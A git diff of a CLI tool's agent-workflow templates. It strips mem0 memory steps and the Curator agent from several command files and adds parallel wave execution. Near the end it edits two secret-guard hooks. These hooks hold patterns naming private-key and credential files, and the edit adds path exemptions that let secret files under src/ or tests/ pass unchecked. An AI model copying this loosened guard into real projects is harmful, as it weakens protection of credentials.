@@ -131,7 +105,7 @@ Max tokens: 1500" Pass `executive_summary` to Actor if `confidence >= 0.7`. -### 2.3 Quality-Stakes Assessment +### 2.2 Quality-Stakes Assessment **Purpose:** Determine deployment context and set minimum quality thresholds before launching Actor variants. @@ -161,7 +135,7 @@ quality_context = { **Rationale:** Prevents quality erosion in debate by establishing non-negotiable baselines before variants propose solutions. -### 2.4 Parallel Actors (3 Variants) +### 2.3 Parallel Actors (3 Variants) **ALWAYS call 3 Actors in parallel with different focuses:** @@ -172,7 +146,6 @@ Task( description="Implement subtask [ID] - Security (v1)", prompt="Implement with SECURITY focus: **AI Packet (XML):** [paste ...] -**mem0 Context:** [top context_patterns + relevance_score] **Quality Context:** deployment_risk_level={risk_level}, min_security={min_security}, min_functionality={min_functionality} ⚠️ Your variant MUST meet minimum quality thresholds. Quality is non-negotiable regardless of security focus. approach_focus: security, variant_id: v1, self_moa_mode: true @@ -185,7 +158,6 @@ Task( description="Implement subtask [ID] - Performance (v2)", prompt="Implement with PERFORMANCE focus: **AI Packet (XML):** [paste ...] -**mem0 Context:** [top context_patterns + relevance_score] **Quality Context:** deployment_risk_level={risk_level}, min_security={min_security}, min_functionality={min_functionality} ⚠️ Your variant MUST meet minimum quality thresholds. Quality is non-negotiable regardless of performance focus. approach_focus: performance, variant_id: v2, self_moa_mode: true @@ -198,7 +170,6 @@ Task( description="Implement subtask [ID] - Simplicity (v3)", prompt="Implement with SIMPLICITY focus: **AI Packet (XML):** [paste ...] -**mem0 Context:** [top context_patterns + relevance_score] **Quality Context:** deployment_risk_level={risk_level}, min_security={min_security}, min_functionality={min_functionality} ⚠️ Your variant MUST meet minimum quality thresholds. Quality is non-negotiable regardless of simplicity focus. approach_focus: simplicity, variant_id: v3, self_moa_mode: true @@ -206,7 +177,7 @@ Follow the Actor agent protocol output format. Ensure `decisions_made` is includ ) ``` -### 2.5 Parallel Monitors (3 Validations) +### 2.4 Parallel Monitors (3 Validations) Validate each variant in parallel: @@ -229,7 +200,7 @@ If a SpecificationContract is provided: include `spec_contract_compliant` + `spe Repeat for v2 and v3 in parallel. -### 2.6 debate-arbiter (Opus) +### 2.5 debate-arbiter (Opus) ``` Task( @@ -268,7 +239,7 @@ Include: comparison_matrix, decision_rationales, synthesis_reasoning (8 steps)." ) ``` -### 2.7 Final Monitor +### 2.6 Final Monitor Validate synthesized code: @@ -286,7 +257,7 @@ Return ONLY valid JSON following MonitorReviewOutput schema." ) ``` -### 2.8 Retry Loop +### 2.7 Retry Loop If Final Monitor returns `valid === false`: 1. Provide feedback including arbiter's synthesis_reasoning @@ -302,7 +273,7 @@ retry_context = { } ``` -### 2.9 Escalation Gate (AskUserQuestion) +### 2.8 Escalation Gate (AskUserQuestion) If Monitor returns `escalation_required === true`, ask user: @@ -321,7 +292,7 @@ AskUserQuestion(questions=[ ]) ``` -### 2.10 Conditional Predictor +### 2.9 Conditional Predictor ```python # Enhanced predictor decision: @@ -392,11 +363,11 @@ else: ) ``` -### 2.11 Apply Changes +### 2.10 Apply Changes Apply synthesized code via Write/Edit tools. Proceed to next subtask. -### 2.12 Gate 2: Tests Available / Run +### 2.11 Gate 2: Tests Available / Run After applying changes, run tests if available. @@ -408,7 +379,7 @@ After applying changes, run tests if available. If no tests found: mark gate as skipped and proceed. -### 2.13 Gate 3: Formatter / Linter +### 2.12 Gate 3: Formatter / Linter After tests gate, run formatter/linter checks if available. diff --git a/src/mapify_cli/templates/commands/map-debug.md b/src/mapify_cli/templates/commands/map-debug.md index 8e2cf6b..6bdd2a3 100644 --- a/src/mapify_cli/templates/commands/map-debug.md +++ b/src/mapify_cli/templates/commands/map-debug.md @@ -40,12 +40,7 @@ Debugging workflow focuses on analysis before implementation: ## Step 1: Analyze the Issue -Before calling task-decomposer, gather context and search mem0: - -```bash -# Search for similar debugging patterns -PATTERN_CONTEXT=$(mcp__mem0__map_tiered_search(query="debug [issue type]", section_filter="DEBUGGING_TECHNIQUES", limit=5)) -``` +Before calling task-decomposer, gather context: 1. **Read error logs/stack traces** (if provided in $ARGUMENTS) 2. **Identify affected files**: Use Grep/Glob to find relevant code @@ -64,7 +59,6 @@ Task( **Context:** - Error logs: [if available] - Affected files: [from analysis] -- Similar past issues: [from mem0 search] Output JSON with: - subtasks: array of {id, description, debug_type: 'investigation'|'fix'|'verification', acceptance_criteria} @@ -240,7 +234,6 @@ This is **completely optional**. Run it when debugging patterns are valuable for ## MCP Tools for Debugging -- `mcp__mem0__map_tiered_search` - Find similar past debugging sessions - `mcp__sequential-thinking__sequentialthinking` - Complex root cause analysis - `mcp__context7__get-library-docs` - Check library documentation for known issues - `mcp__deepwiki__ask_question` - Learn from how others solved similar issues diff --git a/src/mapify_cli/templates/commands/map-efficient.md b/src/mapify_cli/templates/commands/map-efficient.md index b91c5f3..658e473 100644 --- a/src/mapify_cli/templates/commands/map-efficient.md +++ b/src/mapify_cli/templates/commands/map-efficient.md @@ -24,7 +24,6 @@ State machine enforces sequencing, Python validates completion, hooks inject rem /map-efficient does NOT use these agents (by design): - **Evaluator** — quality scoring not needed; Monitor validates correctness directly - **Reflector** — lesson extraction is a separate step via `/map-learn` -- **Curator** — pattern storage is a separate step via `/map-learn` This is NOT a violation of MAP agent rules. Learning is decoupled into `/map-learn` (optional, run after workflow completes) to reduce token usage during execution. @@ -48,7 +47,7 @@ Both files must stay in sync. The orchestrator updates `step_state.json` on ever │ map-efficient.md (THIS FILE - ~540 lines) │ │ 1. Load state → Get next step instruction │ │ 2. Route to appropriate executor based on step phase │ -│ 3. Execute step (Actor/Monitor/mem0/tests/etc) │ +│ 3. Execute step (Actor/Monitor/tests/etc) │ │ 4. Validate completion → Update state │ │ 5. If more steps → Recurse; Else → Complete │ └─────────────────────────────────────────────────────────────┘ @@ -129,9 +128,11 @@ This eliminates reasoning overhead — the contract IS the specification.""" ) # After decomposer returns: -# 1. Extract subtask IDs from blueprint and register them in state: +# 1. Save the full blueprint JSON for wave computation: +# Write the decomposer output to .map//blueprint.json +# 2. Extract subtask IDs from blueprint and register them in state: # python3 .map/scripts/map_orchestrator.py set_subtasks ST-001 ST-002 ST-003 -# 2. Validate step completion: +# 3. Validate step completion: # python3 .map/scripts/map_orchestrator.py validate_step "1.0" ``` @@ -221,6 +222,76 @@ Then use the **Write** tool to create `.map//workflow_state.json`: } ``` +### Wave Computation (after INIT_STATE) + +After INIT_STATE (1.6) completes, compute execution waves from the dependency DAG: + +```bash +python3 .map/scripts/map_orchestrator.py set_waves --blueprint .map/${BRANCH}/blueprint.json +``` + +This reads the blueprint, builds a dependency graph, computes topological waves, +and splits waves by file conflicts. The result is stored in `step_state.json`. + +**Wave execution**: If waves are computed, subtasks within a wave run their Actor +and Monitor phases in parallel. Check wave status with: + +```bash +WAVE=$(python3 .map/scripts/map_orchestrator.py get_wave_step) +MODE=$(echo "$WAVE" | jq -r '.mode') +``` + +If `mode` is `"parallel"`, launch all actors in the wave in ONE message using +multiple `Task()` calls, then all monitors in ONE message. If `mode` is +`"sequential"`, use the standard single-subtask loop below. + +**Parallel wave execution loop**: + +``` +loop: + WAVE = get_wave_step() + if WAVE.is_complete: goto final_verification + + if WAVE.mode == "sequential": + # Single subtask — same as standard behavior below + execute_current_sequential_loop() + else: + # === PARALLEL WAVE === + # Phase A: Prep (sequential per subtask - lightweight) + for each subtask in WAVE.subtasks: + build XML_PACKET, run CONTEXT_SEARCH, optional RESEARCH + + # Phase B: Parallel Actors + # Launch ALL Task(subagent_type="actor") calls in ONE message + # Example: Task(actor, "Implement ST-002") + Task(actor, "Implement ST-004") + + # Phase C: Parallel Monitors + # After all actors return, launch ALL monitors in ONE message + # Example: Task(monitor, "Validate ST-002") + Task(monitor, "Validate ST-004") + + # Phase D: Retry handling + # For each monitor that returned valid=false: + # Re-run actor + monitor for that subtask (serially) + # Track retries per subtask: validate_wave_step SUBTASK_ID STEP_ID + + # Phase E: Per-wave gates + # Run tests + linter ONCE for the entire wave + # pytest / npm test / etc. + + # Phase F: Advance wave + python3 .map/scripts/map_orchestrator.py advance_wave + + # Update workflow state for all subtasks in batch: + python3 .map/scripts/map_step_runner.py update_workflow_state_batch '[ + {"subtask_id": "ST-002", "step_name": "actor", "new_state": "ACTOR_CALLED"}, + {"subtask_id": "ST-002", "step_name": "monitor", "new_state": "MONITOR_PASSED"}, + {"subtask_id": "ST-004", "step_name": "actor", "new_state": "ACTOR_CALLED"}, + {"subtask_id": "ST-004", "step_name": "monitor", "new_state": "MONITOR_PASSED"} + ]' +``` + +Linear DAGs naturally degrade to single-subtask waves (identical to current behavior). + ### Phase: XML_PACKET (2.0) ```python @@ -235,20 +306,6 @@ xml_packet = create_xml_packet(subtask) # Packet boundaries are unambiguous — agents parse by tag, not by heuristics ``` -### Phase: MEM0_SEARCH (2.1) - -```bash -# Tiered search: branch → project → org -mcp__mem0__map_tiered_search( - query="[subtask description]", - limit=5, - user_id="org:[org_name]", - run_id="proj:[project_name]:branch:[branch_name]" -) - -# Re-rank by relevance, pass top 3 to Actor -``` - ### Phase: RESEARCH (2.2) ```python @@ -283,10 +340,6 @@ Task( [paste from .map//current_packet.xml] - -[top context_patterns from mem0 + relevance_score] - - [AAG contract from decomposition: Actor -> Action -> Goal] @@ -466,7 +519,6 @@ Answer: [YES/NO - if NO, explain why not] Question 2: For EACH subtask, did I: - Create XML packet? [YES/NO per subtask] - - Call mem0 search? [YES/NO per subtask] - Call research-agent if 3+ files? [YES/NO/N/A per subtask] - Call Actor agent? [YES/NO per subtask] - Call Monitor agent after Actor? [YES/NO per subtask] @@ -521,7 +573,7 @@ if [ "$IS_COMPLETE" = "true" ]; then # Go to Step 3 else # CONTEXT DISTILLATION before recurse: - # Do NOT pass full RESEARCH logs, mem0 results, or Actor/Monitor transcripts. + # Do NOT pass full RESEARCH logs or Actor/Monitor transcripts. # Pass ONLY the distilled state to keep new context in SFT comfort zone (~4k tokens): # # 1. findings.md — distilled research output (not raw search logs) diff --git a/src/mapify_cli/templates/commands/map-fast.md b/src/mapify_cli/templates/commands/map-fast.md index ed16ee7..be195f3 100644 --- a/src/mapify_cli/templates/commands/map-fast.md +++ b/src/mapify_cli/templates/commands/map-fast.md @@ -6,9 +6,9 @@ description: Minimal workflow for small, low-risk changes (40-50% savings, NO le **⚠️ WARNING: Use for small, low-risk production changes only. Do not skip tests.** -Minimal agent sequence (40-50% token savings). Skips: Predictor, Reflector, Curator. +Minimal agent sequence (40-50% token savings). Skips: Predictor, Reflector. -**Consequences:** No impact analysis, no quality scoring, no learning, knowledge base never improves. +**Consequences:** No impact analysis, no quality scoring, no learning. Implement the following: @@ -30,7 +30,6 @@ Minimal agent sequence (token-optimized, reduced analysis depth): **Agents INTENTIONALLY SKIPPED:** - Predictor (no impact analysis) - Reflector (no lesson extraction) -- Curator (no mem0 pattern updates) **⚠️ CRITICAL:** This is NOT the full MAP workflow. Learning and impact analysis are disabled. @@ -122,12 +121,12 @@ After all subtasks completed: 2. Create commit with message 3. Summarize what was implemented -**Note:** No mem0 pattern updates (learning disabled). +**Note:** Learning disabled (Reflector skipped). ## Critical Constraints - MAX 3 iterations per subtask -- NO learning cycle (Reflector/Curator skipped) +- NO learning cycle (Reflector skipped) - NO impact analysis (Predictor skipped) - NO quality scoring diff --git a/src/mapify_cli/templates/commands/map-learn.md b/src/mapify_cli/templates/commands/map-learn.md index 5e53b41..69521c7 100644 --- a/src/mapify_cli/templates/commands/map-learn.md +++ b/src/mapify_cli/templates/commands/map-learn.md @@ -4,7 +4,7 @@ description: Extract and preserve lessons from completed workflows (OPTIONAL lea # MAP Learn - Post-Workflow Learning -**Purpose:** Standalone command to extract and preserve lessons AFTER completing any MAP workflow. +**Purpose:** Standalone command to extract lessons AFTER completing any MAP workflow. **When to use:** - After `/map-efficient` completes (to preserve patterns from the workflow) @@ -13,24 +13,18 @@ description: Extract and preserve lessons from completed workflows (OPTIONAL lea **What it does:** 1. Calls Reflector agent to analyze workflow outputs and extract patterns -2. Calls Curator agent to store patterns directly via mem0 MCP tools -3. Verifies patterns stored via `mcp__mem0__map_tiered_search` - -**Storage Architecture:** -- Branch tier: `run_id="proj:PROJECT:branch:BRANCH"` (branch-scoped patterns) -- Project tier: `run_id="proj:PROJECT"` (shared across branches) -- Org tier: `user_id="org:ORG"` only (shared across all projects) +2. Outputs a structured learning summary for the user to review **Workflow Summary Input:** $ARGUMENTS --- -## ⚠️ IMPORTANT: This is an OPTIONAL step +## IMPORTANT: This is an OPTIONAL step -**You are NOT required to run this command.** No MAP workflow includes automatic learning — learning is always a separate step via this command. +**You are NOT required to run this command.** No MAP workflow includes automatic learning -- learning is always a separate step via this command. Use /map-learn when: -- You completed /map-efficient, /map-debug, or /map-fast and want to preserve lessons +- You completed /map-efficient, /map-debug, or /map-fast and want to extract lessons - You want to batch-learn from multiple workflows at once - You want to manually trigger learning for custom workflows @@ -56,7 +50,7 @@ Check that $ARGUMENTS contains workflow summary: Workflow: /map-efficient "Add user authentication" Subtasks completed: 3 Files changed: api/auth.py, models/user.py, tests/test_auth.py -Iterations: 5 total (Actor→Monitor loops) +Iterations: 5 total (Actor->Monitor loops) Subtask 1 (Actor output): [paste Actor JSON output] @@ -73,7 +67,7 @@ Subtask 1 (Monitor result): ## Step 2: Reflector Analysis -**⚠️ MUST use subagent_type="reflector"** (NOT general-purpose): +**MUST use subagent_type="reflector"** (NOT general-purpose): ``` Task( @@ -84,15 +78,6 @@ Task( **Workflow Summary:** $ARGUMENTS -**MANDATORY FIRST STEP:** -1. Call mcp__mem0__map_tiered_search to check if similar patterns already exist across tiers -2. Only suggest new bullets if pattern is genuinely novel (not found in any tier) -3. Reference existing patterns with their tier context in your analysis - -**Tier Search Parameters:** -- user_id: 'org:ORG_NAME' (for org-level context) -- run_id: 'proj:PROJECT_NAME:branch:BRANCH_NAME' (for branch context with inheritance) - **Analysis Instructions:** Analyze holistically across ALL subtasks: @@ -111,106 +96,17 @@ Analyze holistically across ALL subtasks: **Output JSON with:** - key_insight: string (one sentence takeaway for entire workflow) -- patterns_used: array of strings (existing patterns applied successfully, with tier labels) +- patterns_used: array of strings (existing patterns applied successfully) - patterns_discovered: array of strings (new patterns worth preserving) - bullet_updates: array of {bullet_id, tag: 'helpful'|'harmful', reason} - suggested_new_bullets: array of {section, content, code_example, rationale} -- workflow_efficiency: {total_iterations, avg_per_subtask, bottlenecks: array of strings} -- mem0_duplicates_found: array of {pattern, tier, memory_id} (from tiered search results)" +- workflow_efficiency: {total_iterations, avg_per_subtask, bottlenecks: array of strings}" ) ``` -**Verification:** Check Reflector output contains evidence of `mcp__mem0__map_tiered_search` call: -- Should show: "mem0 tiered search found existing patterns in [tier]..." -- Or: "No similar patterns found in any tier. This appears to be a novel pattern." - -**If tiered search was NOT called:** Reflector did not follow instructions. Flag this as critical issue. - --- -## Step 3: Curator Storage - -**⚠️ MUST use subagent_type="curator"** (NOT general-purpose): - -``` -Task( - subagent_type="curator", - description="Store workflow learnings via mem0 MCP tools", - prompt="Store Reflector insights using mem0 MCP tools directly: - -**Reflector Insights:** -[paste Reflector JSON output from Step 2] - -**MANDATORY: Curator now calls mem0 MCP tools directly (NO JSON delta output)** - -**Curator will:** -1. Call mcp__mem0__map_tiered_search to verify no duplicates exist -2. Call mcp__mem0__map_add_pattern for each new pattern -3. Call mcp__mem0__map_promote_pattern for patterns with helpful_count >= 3 - -**Tier Selection:** -- Branch tier: run_id='proj:PROJECT:branch:BRANCH' (for unvalidated patterns) -- Project tier: run_id='proj:PROJECT' (for proven patterns) -- Org tier: user_id='org:ORG' only (for cross-project patterns) - -**Deduplication via Fingerprinting:** -- Each pattern has SHA256 fingerprint of normalized content -- mcp__mem0__map_add_pattern returns {created: false} if duplicate exists -- Reference existing pattern ID instead of creating duplicate - -**Promotion Criteria:** -- helpful_count >= 3: Eligible for promotion to higher tier -- helpful_count >= 5: Auto-promote to project tier -- helpful_count >= 10 with cross-project usage: Promote to org tier" -) -``` - -**Verification:** Curator will: -- Show tool calls to `mcp__mem0__map_tiered_search` for deduplication -- Show tool calls to `mcp__mem0__map_add_pattern` for new patterns -- Report patterns stored with their tier and memory_id - -**If Curator outputs JSON instead of calling tools:** Curator did not follow updated instructions. Flag this as critical issue. - ---- - -## Step 4: Verify Storage - -Verify patterns were stored correctly using mem0 tiered search: - -``` -mcp__mem0__map_tiered_search( - query="[pattern content from Reflector]", - user_id="org:ORG_NAME", - run_id="proj:PROJECT:branch:BRANCH", - include_archived=false -) -``` - -**Expected output:** -```json -{ - "results": [ - { - "memory_id": "mem-abc123", - "text": "Pattern content...", - "tier": "branch", - "metadata": { - "section_id": "IMPLEMENTATION_PATTERNS", - "helpful_count": 1, - "created_at": "2025-01-12T..." - } - } - ], - "total": 1 -} -``` - -**If patterns not found:** Check Curator tool call outputs for errors. Retry storage if needed. - ---- - -## Step 5: Summary Report +## Step 3: Summary Report Provide learning summary: @@ -219,114 +115,40 @@ Provide learning summary: **Workflow Analyzed:** [workflow type from input] **Total Subtasks:** [N] -**Iterations Required:** [total Actor→Monitor loops] +**Iterations Required:** [total Actor->Monitor loops] ### Reflector Insights - **Key Insight:** [key_insight from Reflector] -- **Patterns Used:** [count] existing patterns applied successfully (with tier labels) +- **Patterns Used:** [count] existing patterns applied successfully - **Patterns Discovered:** [count] new patterns identified -- **mem0 Duplicates Found:** [count] (avoided duplication via fingerprint) -### Curator Storage Results -- **Stored:** [N] new patterns via mcp__mem0__map_add_pattern -- **Skipped (duplicates):** [N] patterns already exist -- **Promoted:** [N] patterns to higher tiers +### Discovered Patterns +[List each pattern from patterns_discovered with description] -### Tier Distribution -- **Branch tier:** [N] patterns (run_id=proj:PROJECT:branch:BRANCH) -- **Project tier:** [N] patterns (run_id=proj:PROJECT) -- **Org tier:** [N] patterns (user_id=org:ORG only) +### Suggested Improvements +[List each suggested_new_bullet with section and rationale] -### Next Steps -- Review new patterns: `mcp__mem0__map_tiered_search(query="[pattern]", ...)` -- Validate in next workflow: Apply patterns and increment helpful_count if successful -- Promote proven patterns: Use mcp__mem0__map_promote_pattern for patterns with helpful_count >= 3 +### Workflow Efficiency +- **Total Iterations:** [total_iterations] +- **Average per Subtask:** [avg_per_subtask] +- **Bottlenecks:** [list bottlenecks] -**Learning cycle complete. Patterns stored in mem0.** +**Learning extraction complete.** ``` --- -## Troubleshooting - -### Issue: Reflector didn't call mcp__mem0__map_tiered_search - -**Symptom:** Reflector output has no mention of "mem0 tiered search found" or tier labels. - -**Cause:** Reflector agent template not followed. - -**Fix:** -1. Re-run Reflector with explicit instruction: "FIRST STEP: Call mcp__mem0__map_tiered_search" -2. Verify output shows search results with tier labels -3. Proceed to Curator only after verification - -### Issue: Curator output JSON instead of calling tools - -**Symptom:** Curator returns JSON delta operations instead of calling mem0 MCP tools directly. - -**Cause:** Curator using outdated workflow (pre-mem0 migration). - -**Fix:** -1. Ensure Curator agent template is version 4.0.0+ -2. Re-run Curator with explicit instruction: "Call mem0 MCP tools directly, DO NOT output JSON" -3. Verify Curator shows mcp__mem0__map_add_pattern calls in output - -### Issue: mcp__mem0__map_add_pattern returns duplicate error - -**Symptom:** `{created: false, existing_memory_id: "..."}` returned. - -**Cause:** Pattern with same fingerprint already exists. - -**This is expected behavior!** Fingerprint-based deduplication working correctly. - -**Action:** -1. Reference the existing memory_id instead of creating new -2. If pattern needs update, use mcp__mem0__update_memory -3. If pattern should be promoted, use mcp__mem0__map_promote_pattern - -### Issue: mem0 MCP server unavailable - -**Symptom:** Tool calls fail with connection error. - -**Cause:** mem0-mcp server not running or misconfigured. - -**Fix:** -1. Check mem0-mcp server status -2. Verify MCP configuration in Claude Code settings -3. Restart mem0-mcp server if needed -4. If persistent failure: Document patterns manually, retry later - -### Issue: Patterns stored in wrong tier - -**Symptom:** Branch-specific patterns stored at org level, or vice versa. - -**Cause:** Incorrect namespace parameters to mcp__mem0__map_add_pattern. - -**Fix:** -1. Verify namespace format: - - Branch: `run_id="proj:PROJECT:branch:BRANCH"` + `user_id="org:ORG"` - - Project: `run_id="proj:PROJECT"` + `user_id="org:ORG"` - - Org: `user_id="org:ORG"` only (no run_id) -2. Use mcp__mem0__map_promote_pattern to move to correct tier -3. Archive incorrectly placed pattern with mcp__mem0__map_archive_pattern - ---- - ## Token Budget Estimate **Typical /map-learn execution:** - Reflector: ~3K tokens (depends on workflow size) -- Curator: ~2K tokens (direct tool calls, no JSON processing) -- Verification: ~500 tokens (tiered search) -- **Total:** 5-6K tokens for standard workflow +- Summary: ~500 tokens +- **Total:** 3-4K tokens for standard workflow **Large workflow (8+ subtasks):** - Reflector: ~6K tokens -- Curator: ~4K tokens (multiple pattern storage calls) -- Verification: ~1K tokens -- **Total:** 10-12K tokens - -**Compared to per-subtask learning:** /map-learn saves ~(N-1) * 5K tokens for N subtasks. +- Summary: ~1K tokens +- **Total:** 6-7K tokens --- @@ -351,30 +173,10 @@ Key implementation: ``` Reflector extracts: -- mem0 tiered search found no similar patterns in any tier - Pattern: WebSocket reconnection logic - Pattern: Optimistic UI updates -Curator stores via mem0 MCP tools: -``` -mcp__mem0__map_add_pattern( - text="WebSocket exponential backoff: Start with 1s delay, double on each retry (max 30s)...", - user_id="org:myorg", - run_id="proj:dashboard:branch:feature-ws", - metadata={section_id: "IMPLEMENTATION_PATTERNS", helpful_count: 1} -) -→ {created: true, memory_id: "mem-abc123", tier: "branch"} - -mcp__mem0__map_add_pattern( - text="Optimistic UI: Update local state immediately, revert on server error...", - user_id="org:myorg", - run_id="proj:dashboard:branch:feature-ws", - metadata={section_id: "FRONTEND_PATTERNS", helpful_count: 1} -) -→ {created: true, memory_id: "mem-def456", tier: "branch"} -``` - -### Example 2: Batched learning with promotion +### Example 2: Batched learning User completed 3 separate debugging sessions, wants to batch-learn: @@ -397,31 +199,9 @@ Common theme: Concurrency issues" ``` Reflector extracts: -- mem0 tiered search found "concurrency control" in project tier (helpful_count: 4) -- Common pattern: Concurrency control (UPDATE existing) +- Common pattern: Concurrency control - New patterns: DB locks, connection pooling, timezone handling -Curator stores and promotes: -``` -# Update existing pattern (increment helpful_count) -mcp__mem0__update_memory( - memory_id="mem-existing-concurrency", - text="Updated concurrency control pattern with 3 new use cases..." -) - -# Store new patterns at branch tier -mcp__mem0__map_add_pattern(text="Database transaction locks...", ...) -mcp__mem0__map_add_pattern(text="Connection pooling with limits...", ...) -mcp__mem0__map_add_pattern(text="UTC-everywhere timezone pattern...", ...) - -# Promote existing pattern to org tier (helpful_count now 5) -mcp__mem0__map_promote_pattern( - memory_id="mem-existing-concurrency", - target_user_id="org:myorg" -) -→ {promoted: true, new_memory_id: "mem-org-xyz", new_tier: "org"} -``` - --- ## Integration with Other Commands @@ -463,10 +243,4 @@ mcp__mem0__map_promote_pattern( - Capturing holistic patterns across subtasks - Custom workflows that didn't include learning -**Storage Architecture Benefits:** -- **Fingerprint deduplication:** Prevents duplicate patterns automatically -- **Tiered inheritance:** Branch patterns inherit from project, project from org -- **Quality-driven promotion:** Proven patterns automatically bubble up to higher tiers -- **Soft delete:** Archived patterns preserved for audit, excluded from search - **Remember:** The goal is to build organizational knowledge, not to learn from every single task. Quality over quantity. diff --git a/src/mapify_cli/templates/commands/map-release.md b/src/mapify_cli/templates/commands/map-release.md index 24fb187..a6afddb 100644 --- a/src/mapify_cli/templates/commands/map-release.md +++ b/src/mapify_cli/templates/commands/map-release.md @@ -65,16 +65,7 @@ Phase 7: Final Summary and Cleanup **Purpose:** Verify all prerequisites before initiating release. Failure in any gate aborts the workflow. -### 1.1 Load mem0 Context for Release Patterns - -Search mem0 for release-related patterns and past release issues: - -```bash -# Fetch release-related patterns from mem0 -RELEASE_PATTERNS=$(mcp__mem0__map_tiered_search(query="release validation PyPI CI/CD", limit=10)) -``` - -### 1.2 Validation Gates (12 Required) +### 1.1 Validation Gates (12 Required) Execute all validation gates in parallel where possible: @@ -267,7 +258,7 @@ fi **Gap tolerance:** ±2 commits (accounts for chore commits, merge commits, etc.) -### 1.3 Phase 1 Complete +### 1.2 Phase 1 Complete If all 12 gates pass, proceed to Phase 2. @@ -1153,8 +1144,6 @@ pip index versions mapify-cli Use these MCP tools throughout the workflow: -- **`mcp__mem0__map_tiered_search`** - Search for release patterns from past projects -- **`mcp__mem0__map_add_pattern`** - Store release learnings cross-project - **`mcp__sequential-thinking__sequentialthinking`** - Complex decision making for version bump **Built-in Tools (not MCP):** @@ -1200,7 +1189,6 @@ You should: 1. **Phase 1 - Pre-Release Validation:** ```bash - mcp__mem0__map_tiered_search(query="release validation PyPI", limit=10) # Run all 12 validation gates pytest tests/ && black --check src/ && ruff check src/ && mypy src/ && ... # Verify CI passed on main diff --git a/src/mapify_cli/templates/commands/map-review.md b/src/mapify_cli/templates/commands/map-review.md index ea8623b..d271dac 100644 --- a/src/mapify_cli/templates/commands/map-review.md +++ b/src/mapify_cli/templates/commands/map-review.md @@ -63,7 +63,7 @@ These are the fields each agent is expected to return. The command prompt explic This protocol is used identically by all 4 review sections below. Do NOT deviate. -1. **Present top N issues** (N=4 in BIG mode, N=1 in SMALL mode) from the primary source agent for this section, using the section prefix (e.g., ARCH-1, QUALITY-2, TESTS-1, PERF-3) +1. **Present top 4 issues** from the primary source agent for this section, using the section prefix (e.g., ARCH-1, QUALITY-2, TESTS-1, PERF-3) 2. **For each issue:** - Describe the problem with `file:line` references where available - Present 2-3 options with tradeoffs (pros/cons for each) @@ -74,19 +74,13 @@ This protocol is used identically by all 4 review sections below. Do NOT deviate 4. **Summarize decisions** from this section in 3-5 lines before proceeding to the next section - Include: which issues were addressed, which options were chosen, what remains -## Step 0: Select Review Mode +## Step 0: Detect CI Mode **Parse $ARGUMENTS for `--ci` or `--auto`:** - If `--ci` or `--auto` is present in $ARGUMENTS → set CI_MODE=true - CI_MODE skips all AskUserQuestion calls and auto-selects recommended options -**If NOT CI_MODE:** Use AskUserQuestion to ask the user: - -> How thorough should this review be? -> - **BIG** (Recommended): Up to 4 issues per section — comprehensive review -> - **SMALL**: 1 issue per section — quick pass for small changes - -Default to BIG if user doesn't respond or in CI mode. +**Always use comprehensive review** — up to 4 issues per section, no mode selection menu. ## Phase A: Collection (Parallel) @@ -101,16 +95,7 @@ Save the diff output — it will be passed to all 3 agents. ### Step A.2: Launch all parallel calls -In **ONE message**, launch all 7 calls in parallel (no dependencies between them): - -**4 mem0 queries:** - -``` -mcp__mem0__map_tiered_search(query="architecture review patterns") -mcp__mem0__map_tiered_search(query="code quality standards") -mcp__mem0__map_tiered_search(query="test coverage criteria") -mcp__mem0__map_tiered_search(query="performance review patterns") -``` +In **ONE message**, launch all 3 calls in parallel (no dependencies between them): **3 agent Task calls** (pass the git diff + Review Preferences to each): @@ -126,9 +111,6 @@ Task( **Changes:** [paste git diff output] -**mem0 Context:** -[paste relevant mem0 patterns from queries above — use architecture + code quality results] - Check for: - Code correctness and logic errors - Security vulnerabilities (OWASP top 10) @@ -156,9 +138,6 @@ Task( **Changes:** [paste git diff output] -**mem0 Context:** -[paste relevant mem0 patterns from queries above — use architecture results] - Analyze: - Affected components and modules - Breaking changes (API, schema, behavior) @@ -187,9 +166,6 @@ Task( **Changes:** [paste git diff output] -**mem0 Context:** -[paste relevant mem0 patterns from queries above — use code quality + test coverage results] - Provide quality assessment using 1-10 scoring: - Functionality score (1-10) - Code quality score (1-10) @@ -208,7 +184,7 @@ Output JSON with: ) ``` -**Parallel execution:** All 7 calls (4 mem0 + 3 agents) MUST be issued in a single message. Wait for all to complete before proceeding. +**Parallel execution:** All 3 agent calls MUST be issued in a single message. Wait for all to complete before proceeding. ### Hard Stop Check @@ -309,7 +285,6 @@ Present the verdict with a summary table: When `CI_MODE = true` (triggered by `--ci` or `--auto` in $ARGUMENTS): - Skip all AskUserQuestion calls -- Auto-select BIG mode (4 issues per section) - Auto-select recommended options for all issues - Present all 4 sections as a batch report (no pauses between sections) - Output structured verdict at the end @@ -325,7 +300,6 @@ If the review revealed valuable patterns or common issues worth preserving: ## MCP Tools Used -- `mcp__mem0__map_tiered_search` — Search past review patterns (4 targeted queries) - `mcp__sequential-thinking__sequentialthinking` — Complex analysis decisions during interactive presentation --- diff --git a/src/mapify_cli/templates/hooks/block-secrets.py b/src/mapify_cli/templates/hooks/block-secrets.py index ac46e72..a416fac 100755 --- a/src/mapify_cli/templates/hooks/block-secrets.py +++ b/src/mapify_cli/templates/hooks/block-secrets.py @@ -60,14 +60,39 @@ ] +SAFE_PATH_PREFIXES = [ + ".claude/hooks/", + ".claude/agents/", + ".claude/commands/", + ".claude/references/", + ".claude/skills/", + "src/", + "tests/", + "docs/", + "scripts/", +] + + def is_sensitive_file(file_path: str) -> bool: """Check if file path matches any sensitive file pattern. Checks ALL path components (not just filename) to catch patterns - in directory names or parent paths. + in directory names or parent paths. Skips files in known safe + directories (hooks, agents, source code, tests, etc.) """ path_obj = Path(file_path) + # Normalize to relative path for prefix matching + try: + rel = str(path_obj.relative_to(Path.cwd())) + except ValueError: + rel = str(path_obj) + + # Allow known safe directories + for prefix in SAFE_PATH_PREFIXES: + if rel.startswith(prefix): + return False + # Check each path component against all patterns for part in path_obj.parts: for pattern in SENSITIVE_PATTERNS: diff --git a/src/mapify_cli/templates/hooks/safety-guardrails.py b/src/mapify_cli/templates/hooks/safety-guardrails.py old mode 100644 new mode 100755 index 4174337..20aa031 --- a/src/mapify_cli/templates/hooks/safety-guardrails.py +++ b/src/mapify_cli/templates/hooks/safety-guardrails.py @@ -26,8 +26,8 @@ r"id_rsa", r"id_ed25519", r"\.key$", - r"password", - r"token", + r"passwords?\.(json|ya?ml|toml|txt)$", # password files, not any file with "password" in path + r"tokens?\.(json|ya?ml|toml|txt)$", # token files, not any file with "token" in path ] # Dangerous bash command patterns @@ -46,7 